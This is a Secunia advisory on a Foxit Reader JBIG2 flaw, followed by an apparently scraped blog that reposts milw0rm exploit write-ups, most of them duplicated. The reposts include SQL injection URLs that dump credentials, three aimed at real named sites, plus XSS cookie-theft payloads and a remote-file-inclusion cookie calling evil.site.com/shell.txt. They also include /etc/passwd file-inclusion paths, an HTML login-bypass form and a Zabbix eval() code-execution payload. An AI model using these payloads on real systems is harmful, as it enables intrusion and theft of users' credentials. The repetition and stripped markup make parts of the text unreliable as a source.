Secunia Research 09/03/2009
- Foxit Reader JBIG2 Symbol Dictionary Processing Vulnerability -
Table of Contents
Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10
1) Affected Software
* Foxit Reader version 3.0.2009.1301
NOTE: Prior versions may also be affected.
2) Severity
Rating: Highly critical
Impact: System access
Where: Remote
3) Vendor's Description of Software
"As a small and fast PDF viewer, Foxit Reader currently has over 50
million users all around the world. After keeping users waiting for
almost two months, Foxit Reader 3.0 has been released and introduces
many fascinating new features such as multimedia design and Foxit
OnDemand Content Management."
Product Link:
http://www.foxitsoftware.com/pdf/rd_intro.php
4) Description of Vulnerability
Secunia Research has discovered a vulnerability in Foxit Reader, which
can be exploited by malicious people to potentially compromise a
user's system.
The vulnerability is caused due to an error when processing JBIG2
symbol dictionary segments. This can be exploited to dereference
uninitialised memory via a specially crafted PDF file.
Successful exploitation may allow execution of arbitrary code.
5) Solution
Update to version 3.0 Build 1506 or version 2.3 Build 3902.
6) Time Table
27/02/2009 - Vendor notified.
28/02/2009 - Vendor response.
09/03/2009 - Public disclosure.
7) Credits
Discovered by Alin Rad Pop, Secunia Research.
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-0191 for the vulnerability.
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-11/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
Showing posts with label vulnerability. Show all posts
Showing posts with label vulnerability. Show all posts
Blogsa <= 1.0 Beta 3 XSS Vulnerability
Software: Blogsa <= 1.0 Beta 3 XSS Vulnerability Software Site: blogsa.net Discovered by: Onur YILMAZ aka DJR Blog: http://www.onuryilmaz.info E-mail: contactonuryilmazinfo
XSS
http://localhost/Widgets.aspx?w=Search&p=do&searchText= script alert(document.cookie) /script
Screen
http://img14.imageshack.us/img14/7803/12371681.jpg
XSS
http://localhost/Widgets.aspx?w=Search&p=do&searchText= script alert(document.cookie) /script
Screen
http://img14.imageshack.us/img14/7803/12371681.jpg
CMS S.Builder <= 3.7 Remote File Inclusion Vulnerability
CMS S.Builder <= 3.7 RFI Vulnerability
Information:
Vendor: http://www.sbuilder.ru
Affected versions: 3.7 and possibly later versions
Description:
The engine of this cms makes site files (index.php, etc) with code like:
PHP Code:
if (!isset($GLOBALS['binn_include_path'])) $GLOBALS['binn_include_path'] = '';
...
include_once($GLOBALS['binn_include_path'].'prog/pl_menu/show_menu.php');
...
If register_globals=On, attacker can write remote url (if allow_url_fopen=On) or local path into variable binn_include_path.
PoC:
HTTP Request:
GET /index.php HTTP/1.1
Host: www.site.com
Cookie: binn_include_path=http://evil.site.com/shell.txt?
# by cr0w
# http://cr0w-at.blogspot.com
# milw0rm
Information:
Vendor: http://www.sbuilder.ru
Affected versions: 3.7 and possibly later versions
Description:
The engine of this cms makes site files (index.php, etc) with code like:
PHP Code:
if (!isset($GLOBALS['binn_include_path'])) $GLOBALS['binn_include_path'] = '';
...
include_once($GLOBALS['binn_include_path'].'prog/pl_menu/show_menu.php');
...
If register_globals=On, attacker can write remote url (if allow_url_fopen=On) or local path into variable binn_include_path.
PoC:
HTTP Request:
GET /index.php HTTP/1.1
Host: www.site.com
Cookie: binn_include_path=http://evil.site.com/shell.txt?
# by cr0w
# http://cr0w-at.blogspot.com
# milw0rm
nForum 1.5 Multiple Remote SQL Injection Vulnerabilities
Application: nForum
Version: 1.5
Website: http://sourceforge.net/projects/nforum/
Bugs: [A] Multiple SQL Injection
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: showtheme.php, userinfo.php
These bugs allows a guest to view username and
the password of a registered user.
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT 1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23
http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23
Fix
No fix.
# milw0rm
Version: 1.5
Website: http://sourceforge.net/projects/nforum/
Bugs: [A] Multiple SQL Injection
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: showtheme.php, userinfo.php
These bugs allows a guest to view username and
the password of a registered user.
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT 1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23
http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23
Fix
No fix.
# milw0rm
OneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability
OneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability
Script: "OneOrZero Helpdesk and Task Management System is a powerful enterprise helpdesk system
used by companies and groups large and small to manage information and requests in their organization. "
Script site: http://www.oneorzero.com/
Download: http://www.oneorzero.com/index.php?controller=main_general&option=main_downloads
[LFI] Vuln: http://site.com/oozv1657/common/login.php?default_language=../../../../../../../../../../etc/passwd
Bug: ./oozv1657/common/login.php (line: 104)
require_once "../common/common.php";
if (eregi("supporter", $_SERVER[PHP_SELF]) || eregi("admin", $_SERVER[PHP_SELF]))
require_once "../lang/$default_language.lang.php";
else
require_once "lang/$default_language.lang.php"; // LFI (register_globals = On, magic_quotes_gpc = Off)
Greetz: D3m0n_DE * str0ke * and otherz..
[ dun / 2009 ]
# milw0rm
Script: "OneOrZero Helpdesk and Task Management System is a powerful enterprise helpdesk system
used by companies and groups large and small to manage information and requests in their organization. "
Script site: http://www.oneorzero.com/
Download: http://www.oneorzero.com/index.php?controller=main_general&option=main_downloads
[LFI] Vuln: http://site.com/oozv1657/common/login.php?default_language=../../../../../../../../../../etc/passwd
Bug: ./oozv1657/common/login.php (line: 104)
require_once "../common/common.php";
if (eregi("supporter", $_SERVER[PHP_SELF]) || eregi("admin", $_SERVER[PHP_SELF]))
require_once "../lang/$default_language.lang.php";
else
require_once "lang/$default_language.lang.php"; // LFI (register_globals = On, magic_quotes_gpc = Off)
Greetz: D3m0n_DE * str0ke * and otherz..
[ dun / 2009 ]
# milw0rm
isiAJAX v1 (praises.php id) Remote SQL Injection Vulnerability
Script site: http://isiajax.sourceforge.net/
Download: http://sourceforge.net/project/showfiles.php?group_id=169754
[SQL] Vuln: http://site.com/isiAJAX/ejemplo/paises.php?id=-1+UNION+SELECT+1,USER()--
http://isiajax.sourceforge.net/demos/practicos/busqueda/paises.php?id=-1+UNION+SELECT+1,CONCAT_WS(char(58),id,nombre,apellidos,id_pais,edad,telefono,email)+from+usuarios--
Bug: ./isiAJAX/ejemplo/paises.php (linez: 10-14)
$paise = mysql_query("SELECT id, nombre FROM pais WHERE id_continente=$_GET[id]", $conexion); //
while ($paises = mysql_fetch_row($paise)) { // SQL inj.
?> //
}
Greetz: D3m0n_DE * str0ke * and otherz..
[ dun / 2009 ]
# milw0rm
Download: http://sourceforge.net/project/showfiles.php?group_id=169754
[SQL] Vuln: http://site.com/isiAJAX/ejemplo/paises.php?id=-1+UNION+SELECT+1,USER()--
http://isiajax.sourceforge.net/demos/practicos/busqueda/paises.php?id=-1+UNION+SELECT+1,CONCAT_WS(char(58),id,nombre,apellidos,id_pais,edad,telefono,email)+from+usuarios--
Bug: ./isiAJAX/ejemplo/paises.php (linez: 10-14)
$paise = mysql_query("SELECT id, nombre FROM pais WHERE id_continente=$_GET[id]", $conexion); //
while ($paises = mysql_fetch_row($paise)) { // SQL inj.
?> //
}
Greetz: D3m0n_DE * str0ke * and otherz..
[ dun / 2009 ]
# milw0rm
Blue Eye CMS <= 1.0.0 Remote Cookie SQL Injection Vulnerability
BlueEye CMS <= 1.0.0 Remote Cookie SQL Injection Vulnerability
found by ka0x
Download: http://kent.dl.sourceforge.net/sourceforge/blueeyecms/blue_eye_cms-1_0_0_preRC.rar
need magic_quotes_gpc = Off
- Vuln code:
10: if (!empty($_COOKIE["BlueEyeCMS_login"])) { // --> Only??
11: $c_login = $_COOKIE["BlueEyeCMS_login"]; // --> Not clean??
12: $c_pass = $_COOKIE["BlueEyeCMS_pass"];
13: $c_key = $_COOKIE["BlueEyeCMS_key"];
....
16: $table = $db_prefix."users";
17: $query = mysql_query("SELECT id FROM `$table` WHERE `user` = '$c_login' AND `password` = '$c_pass' AND `key` = '$c_key'"); // -> VULN
18: $rows = mysql_num_rows($query); -> num rows of the query
19: $result = mysql_fetch_array($query);
....
21: if ($rows == 1) { // -> check if exists one row..
22: $logged = $c_login;
23: $logged_id = $result['id'];
24: }
....
204: img src="http://www.blogger.com/%5C" / Logged as: ".$logged." (ID: ".$logged_id.")
Proof Of Concept:
javascript:document.cookie = "BlueEyeCMS_login=' UNION SELECT concat(user,0x3A,password) FROM blueeye_users WHERE id=1/*; path=/";
# milw0rm
found by ka0x
Download: http://kent.dl.sourceforge.net/sourceforge/blueeyecms/blue_eye_cms-1_0_0_preRC.rar
need magic_quotes_gpc = Off
- Vuln code:
10: if (!empty($_COOKIE["BlueEyeCMS_login"])) { // --> Only??
11: $c_login = $_COOKIE["BlueEyeCMS_login"]; // --> Not clean??
12: $c_pass = $_COOKIE["BlueEyeCMS_pass"];
13: $c_key = $_COOKIE["BlueEyeCMS_key"];
....
16: $table = $db_prefix."users";
17: $query = mysql_query("SELECT id FROM `$table` WHERE `user` = '$c_login' AND `password` = '$c_pass' AND `key` = '$c_key'"); // -> VULN
18: $rows = mysql_num_rows($query); -> num rows of the query
19: $result = mysql_fetch_array($query);
....
21: if ($rows == 1) { // -> check if exists one row..
22: $logged = $c_login;
23: $logged_id = $result['id'];
24: }
....
204: img src="http://www.blogger.com/%5C" / Logged as: ".$logged." (ID: ".$logged_id.")
Proof Of Concept:
javascript:document.cookie = "BlueEyeCMS_login=' UNION SELECT concat(user,0x3A,password) FROM blueeye_users WHERE id=1/*; path=/";
# milw0rm
Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability
Vendor : http://jogjacamp.com
bugs : /index.php?action=news.detail&id_news=
exploit : union select concat(username,0x3a,password),2,3 from phpss_account--
POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p
# milw0rm
bugs : /index.php?action=news.detail&id_news=
exploit : union select concat(username,0x3a,password),2,3 from phpss_account--
POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p
# milw0rm
NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability
Program: NovaBoard
Version: <= 1.0.1 File affected: index.php Download: http://www.novaboard.net/ Found by Pepelux
eNYe-Sec - www.enye-sec.org
About the program (by the author's page)
NovaBoard is a free, feature rich community message board software written in
PHP & MySQL that allows you to set up your own forum within minutes.
With a smart modules feature and the ease of creating your own themes you can
style and manipulate your board to look and perform how you want.
NovaBoard makes running a message board a breeze!
Bug
You can inject JS.
Exploit
Persistent XSS:
You can write a message to another user of the forum and inject XSS code:
Message subject:
Message recipient:
Message:
script alert(document.cookie) /script
you can also send the user cookie to another site
Non-persistent XSS:
http://site.com/index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic=
Response:
If you are an authenticated user you'll see something like this:
PHPSESSID=241092c53c1379df01b743d910f61c62; nova_name=Member;
nova_password=f11d8a080797894ad3e714fa2f849c62
Username and password are stored in the cookie.
If you are not authenticated:
PHPSESSID=241092c53c1379df01b743d910f61c62
# milw0rm
Version: <= 1.0.1 File affected: index.php Download: http://www.novaboard.net/ Found by Pepelux
eNYe-Sec - www.enye-sec.org
About the program (by the author's page)
NovaBoard is a free, feature rich community message board software written in
PHP & MySQL that allows you to set up your own forum within minutes.
With a smart modules feature and the ease of creating your own themes you can
style and manipulate your board to look and perform how you want.
NovaBoard makes running a message board a breeze!
Bug
You can inject JS.
Exploit
Persistent XSS:
You can write a message to another user of the forum and inject XSS code:
Message subject:
Message recipient:
Message:
script alert(document.cookie) /script
you can also send the user cookie to another site
Non-persistent XSS:
http://site.com/index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic=
Response:
If you are an authenticated user you'll see something like this:
PHPSESSID=241092c53c1379df01b743d910f61c62; nova_name=Member;
nova_password=f11d8a080797894ad3e714fa2f849c62
Username and password are stored in the cookie.
If you are not authenticated:
PHPSESSID=241092c53c1379df01b743d910f61c62
# milw0rm
BlindBlog 1.3.1 (SQL/AB/LFI) Multiple Remote Vulnerabilities
Application: BlindBlog
Version: 1.3.1
Website: http://sourceforge.net/projects/cbblog/
Bugs:
[A] SQL Injection
[B] Authentication Bypass
[C] Local File Inclusion
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] SQL Injection
Requisites: magic_quotes_gpc = off
File affected: comment.php
All queries are vulnerable.
This bug allows a guest to view username and the
password of a registered user.
$id = (isset($_GET['id']) && $_GET['id'] !='') ? $_GET['id'] : getlastid();
$SQL = "SELECT comment,author,contact,date FROM `cblog_comments`
WHERE `pid` = '$id' ORDER BY `cid` DESC";
$resulted = $db->query($SQL, $querys);
while ($result = mysql_fetch_assoc($resulted))
$comments[] = $result;
- [B] Authentication Bypass
Requisites: magic_quotes_gpc = off
File affected: admin.login.php
$username = $_POST['username'];
$password = md5($_POST['password']);
include('./db_config.php');
$db = new db_stuff;
$db->connect();
$result = $db->query("SELECT * FROM `cblog_users` WHERE `username` =
'$username'", $querys);
if (mysql_num_rows($result) > 1 || mysql_num_rows($result) < 1)
{
echo "Incorrect username";
exit;
}
$result = mysql_fetch_assoc($result);
if ($result['password'] !== $password)
{
echo 'Incorrect Password';
exit;
}
- [C] Local File Inclusion
Requisites: none
File affected: admin.php
This bug allow an admin to include local files.
It is possible bypass authentication using the
previous bug.
With this bug is possible to execute remote
commands using Apache logs.
...
} else if (isset($_GET['act']) && $_SESSION['is_admin'])
{
$loc = 'admin.'.$_GET['act'].'.php';
include('./'.$loc);
}
...
Code
- [A] SQL Injection
http://www.site.com/path/comment.php?id=-1' UNION ALL SELECT
NULL,CONCAT(username, char(58), password),3,4 FROM cblog_users%23
- [B] Authentication Bypass
html
head
title BlindBlog 1.3.1 Authentication Bypass Exploit /title
/head
body
form
action="http://www.site.com/path/admin/admin.login.php?go=1"
method="POST"
input type="hidden" name="username" value="-1'
UNION ALL SELECT
1,'admin',MD5('expl')#"
input type="hidden" name="password" value="expl"
input type="submit" value="Exploit"
/form
/body
/html
- [C] Local File Inclusion
Tested on MAC OSX: /Applications/xampp/xamppfiles/htdocs/cbblog/admin/admin.php
http://www.site.com/path/admin/admin.php?act=/../../../../../../../etc/passwd
# milw0rm
Version: 1.3.1
Website: http://sourceforge.net/projects/cbblog/
Bugs:
[A] SQL Injection
[B] Authentication Bypass
[C] Local File Inclusion
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] SQL Injection
Requisites: magic_quotes_gpc = off
File affected: comment.php
All queries are vulnerable.
This bug allows a guest to view username and the
password of a registered user.
$id = (isset($_GET['id']) && $_GET['id'] !='') ? $_GET['id'] : getlastid();
$SQL = "SELECT comment,author,contact,date FROM `cblog_comments`
WHERE `pid` = '$id' ORDER BY `cid` DESC";
$resulted = $db->query($SQL, $querys);
while ($result = mysql_fetch_assoc($resulted))
$comments[] = $result;
- [B] Authentication Bypass
Requisites: magic_quotes_gpc = off
File affected: admin.login.php
$username = $_POST['username'];
$password = md5($_POST['password']);
include('./db_config.php');
$db = new db_stuff;
$db->connect();
$result = $db->query("SELECT * FROM `cblog_users` WHERE `username` =
'$username'", $querys);
if (mysql_num_rows($result) > 1 || mysql_num_rows($result) < 1)
{
echo "Incorrect username";
exit;
}
$result = mysql_fetch_assoc($result);
if ($result['password'] !== $password)
{
echo 'Incorrect Password';
exit;
}
- [C] Local File Inclusion
Requisites: none
File affected: admin.php
This bug allow an admin to include local files.
It is possible bypass authentication using the
previous bug.
With this bug is possible to execute remote
commands using Apache logs.
...
} else if (isset($_GET['act']) && $_SESSION['is_admin'])
{
$loc = 'admin.'.$_GET['act'].'.php';
include('./'.$loc);
}
...
Code
- [A] SQL Injection
http://www.site.com/path/comment.php?id=-1' UNION ALL SELECT
NULL,CONCAT(username, char(58), password),3,4 FROM cblog_users%23
- [B] Authentication Bypass
html
head
title BlindBlog 1.3.1 Authentication Bypass Exploit /title
/head
body
form
action="http://www.site.com/path/admin/admin.login.php?go=1"
method="POST"
input type="hidden" name="username" value="-1'
UNION ALL SELECT
1,'admin',MD5('expl')#"
input type="hidden" name="password" value="expl"
input type="submit" value="Exploit"
/form
/body
/html
- [C] Local File Inclusion
Tested on MAC OSX: /Applications/xampp/xamppfiles/htdocs/cbblog/admin/admin.php
http://www.site.com/path/admin/admin.php?act=/../../../../../../../etc/passwd
# milw0rm
Zabbix 1.6.2 Frontend Multiple Vulnerabilities
Name Multiple Vulnerabilities in Zabbix Frontend
Systems Affected Zabbix 1.6.2 and possibly earlier versions
Severity High
Impact (CVSSv2) High 9.7/10, vector: (AV:N/AC:L/Au:N/C:P/I:C/A:C)
Vendor http://www.zabbix.com/
Advisory http://www.ush.it/team/ush/hack-zabbix_162/adv.txt
Authors Antonio "s4tan" Parata (s4tan AT ush DOT it)
Francesco "ascii" Ongaro (ascii AT ush DOT it)
Giovanni "evilaliv3" Pellerano (evilaliv3 AT
digitalbullets DOT org)
I. BACKGROUND
From the Zabbix web site: "ZABBIX offers advanced monitoring, alerting
and visualization features today which are missing in other monitoring
systems, even some of the best commercial ones".
II. DESCRIPTION
Multiple Vulnerabilities exist in Zabbix front end software.
III. ANALYSIS
Summary:
A) Remote Code Execution
B) Cross Site Request Forgery
C) Local File Inclusion
A) Remote Code Execution
A Remote Code Execution issue has been found in Zabbix version
1.6.2 and no authentication is required in order to exploit this
vulnerability. The Magic Quotes must be off in order to exploit
this vulnerability, however this feature will not be supported
starting with PHP 6.0 (ref. http://it2.php.net/magic_quotes).
Zabbix has a security feature that parses all incoming input for
possible bad chars with the help of the function check_fields() defined
in "include/validate.inc.php". The issue we have discovered is contained
in this input validation code.
Pages define an array of every used variable that derives from external
(GPC) input. An example of the mechanism is the following:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$fields=array(
"config"=> array(T_ZBX_INT, O_OPT, P_SYS, IN("0,1"), NULL),
// actions
"groupid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
"hostid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
"start"=> array(T_ZBX_INT, O_OPT, P_SYS, BETWEEN(0,65535)."({}%".
PAGE_SIZE."==0)", NULL),
"next"=> array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),
"prev"=> array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),
// filter
"filter_rst"=> array(T_ZBX_INT, O_OPT, P_SYS, IN(array(0,1)), NULL),
"filter_set"=> array(T_ZBX_STR, O_OPT, P_SYS, null, NULL),
"userid"=> array(T_ZBX_INT, O_OPT, P_SYS, DB_ID, NULL),
'filter_timesince'=> array(T_ZBX_INT, O_OPT, P_UNSET_EMPTY, null, NULL),
'filter_timetill'=> array(T_ZBX_INT, O_OPT, P_UNSET_EMPTY, null, NULL),
//ajax
'favobj'=> array(T_ZBX_STR, O_OPT, P_ACT, NULL, NULL),
'favid'=> array(T_ZBX_STR, O_OPT, P_ACT, NOT_EMPTY,
'isset({favobj})'),
'state'=> array(T_ZBX_INT, O_OPT, P_ACT, NOT_EMPTY,
'isset({favobj}) && ("filter"=={favobj})'),
);
check_fields($fields);
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
After the definition of the "$fields" array all the variables are
checked by the function check_fields().
The main step of the check_fields() function is:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
foreach($fields as $field => $checks){
$err |= check_field($fields, $field, $checks);
}
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
Following the check_field() function we have identified that the
function's main steps are the creation of some local variables using
list() and a consequent call of calc_exp() (which resides in the same
file).
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
list($type, $opt, $flags, $validation, $exception) = $checks;
[...]
$except=calc_exp($fields,$field,$exception);
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
calc_exp()'s code is:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
function calc_exp($fields,$field,$expression){
if(zbx_strstr($expression,"{}") && !isset($_REQUEST[$field]))
return FALSE;
if(zbx_strstr($expression,"{}") && !is_array($_REQUEST[$field]))
$expression = str_replace("{}",'$_REQUEST["'.$field.'"]',$expression);
if(zbx_strstr($expression,"{}") && is_array($_REQUEST[$field])){
foreach($_REQUEST[$field] as $key => $val){
$expression2 =
str_replace("{}",'$_REQUEST["'.$field.'"]["'.$key.'"]',$expression);
if(calc_exp2($fields,$field,$expression2)==FALSE)
return FALSE;
}
return TRUE;
}
return calc_exp2($fields,$field,$expression);
}
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
As you can see we should be able to call calc_exp2(), our vulnerable
function, avoiding to fall into a breach that exits (returns) from the
function.
Investigating calc_exp2()'s source:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
function calc_exp2($fields,$field,$expression){
foreach($fields as $f => $checks){
$expression = str_replace('{'.$f.'}','$_REQUEST["'.$f.'"]',$expression);
}
$expression = trim($expression,"& ");
$exec = "return (".$expression.") ? 1 : 0;";
$ret = eval($exec);
return $ret;
}
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
We have reached a function that contains an eval() call of the "$exec"
variable that contains user controlled data.
To better understand how the executed string is composed we must find
a disposable page. Thanks to "locales.php" we can reach this function
without any authentication.
Now if we try to execute the query:
/locales.php?download&langTo&extlang[AAA]=1
The value of $exec is the following:
return (($_REQUEST["extlang"]["AAA"]!='')) ? 1 : 0;
Some constraints exist: the injected payload must comply with the
calc_exp()'s requirements in order to call calc_exp2() and the created
string must be syntactically correct. What we can do is to play with
the key values of the array. An intermediate test was:
/locales.php?download&langTo&extlang[AAA"];phpinfo();]=1
But it generates a syntax error. After some thinking the problem was
solved in this way:
/locales.php?download&langTo&extlang[".phpinfo()."]=1
Now the syntax is correct and the payload gets executed.
B) Cross Site Request Forgery
A CSRF vulnerability exists in file "users.php". If the admin visits the
following link:
/users.php?config=0&save&alias=alias&name=foo&surname=foo&user_type=3&
lang=lang&theme=theme&autologout=0&url=url&refresh=0
A user with admin permissions is created.
C) Local File Inclusion
If the user is authenticated, a Local File Inclusion vulnerability
exists in file "locales.php".
The following URL exploits this vulnerability:
/locales.php?action=1&next=1&srclang=../validate&extlang=en
A string in the form of ".inc.php" is automatically appended to the
local file path. Despite that it's possible to include every target
file truncating the filename using (nullbyte):
/locales.php?next=1&srclang=../../../../../../../var/log/apache2/error_log%22
Nullbyte injection normally requires magic quotes off.
The vulnerable code is the following:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
'srclang'=> array(T_ZBX_STR, O_OPT, NULL, NOT_EMPTY, 'isset({next})'),
[...]
else if(isset($_REQUEST['next'])){
[...]
$fileFrom = 'include/locales/'.$_REQUEST['srclang'].".inc.php";
if(file_exists($fileFrom)){
include($fileFrom);
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
IV. DETECTION
Zabbix 1.6.2 and possibly earlier versions are vulnerable.
V. WORKAROUND
Update zabbix from svn the server (svn://svn.zabbix.com) or download
version 1.6.3 when aviable.
VI. VENDOR RESPONSE
Vendor will fix all the exposed vulnerabilities in Zabbix 1.6.3.
VII. CVE INFORMATION
No CVE at this time.
VIII. DISCLOSURE TIMELINE
20081215 Bug discovered
20090116 Initial vendor contact
20090116 Vendor Response (Fixes will be included in Zabbix 1.6.3)
20090130 Second email (When this is going to be fixed?)
20090131 Vendor Response (Everything has been fixed a week ago and is
publicy aviable in the SVN, Zabbix 1.6.3 will be released
within 10-15 days)
20090220 Third email (20 days elasped and no response, we will release
on 23 Feb)
20090220 Vendor Response (Postpone of 5-10 days required)
20090220 Third email (We will wait 5-10 days, 2 March is the deadline
if no contact)
20090303 Forced Advisory Release
IX. CREDIT
Antonio "s4tan" Parata, Francesco "ascii" Ongaro and Giovanni
"evilaliv3" Pellerano are credited with the discovery of this
vulnerability.
Antonio "s4tan" Parata
web site: http://www.ictsc.it/
mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it
Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it
Giovanni "evilaliv3" Pellerano
web site: http://www.evilaliv3.org
mail: giovanni.pellerano AT evilaliv3 DOT org
X. LEGAL NOTICES
Copyright (c) 2009 Francesco "ascii" Ongaro
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
# milw0rm
Systems Affected Zabbix 1.6.2 and possibly earlier versions
Severity High
Impact (CVSSv2) High 9.7/10, vector: (AV:N/AC:L/Au:N/C:P/I:C/A:C)
Vendor http://www.zabbix.com/
Advisory http://www.ush.it/team/ush/hack-zabbix_162/adv.txt
Authors Antonio "s4tan" Parata (s4tan AT ush DOT it)
Francesco "ascii" Ongaro (ascii AT ush DOT it)
Giovanni "evilaliv3" Pellerano (evilaliv3 AT
digitalbullets DOT org)
I. BACKGROUND
From the Zabbix web site: "ZABBIX offers advanced monitoring, alerting
and visualization features today which are missing in other monitoring
systems, even some of the best commercial ones".
II. DESCRIPTION
Multiple Vulnerabilities exist in Zabbix front end software.
III. ANALYSIS
Summary:
A) Remote Code Execution
B) Cross Site Request Forgery
C) Local File Inclusion
A) Remote Code Execution
A Remote Code Execution issue has been found in Zabbix version
1.6.2 and no authentication is required in order to exploit this
vulnerability. The Magic Quotes must be off in order to exploit
this vulnerability, however this feature will not be supported
starting with PHP 6.0 (ref. http://it2.php.net/magic_quotes).
Zabbix has a security feature that parses all incoming input for
possible bad chars with the help of the function check_fields() defined
in "include/validate.inc.php". The issue we have discovered is contained
in this input validation code.
Pages define an array of every used variable that derives from external
(GPC) input. An example of the mechanism is the following:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$fields=array(
"config"=> array(T_ZBX_INT, O_OPT, P_SYS, IN("0,1"), NULL),
// actions
"groupid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
"hostid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
"start"=> array(T_ZBX_INT, O_OPT, P_SYS, BETWEEN(0,65535)."({}%".
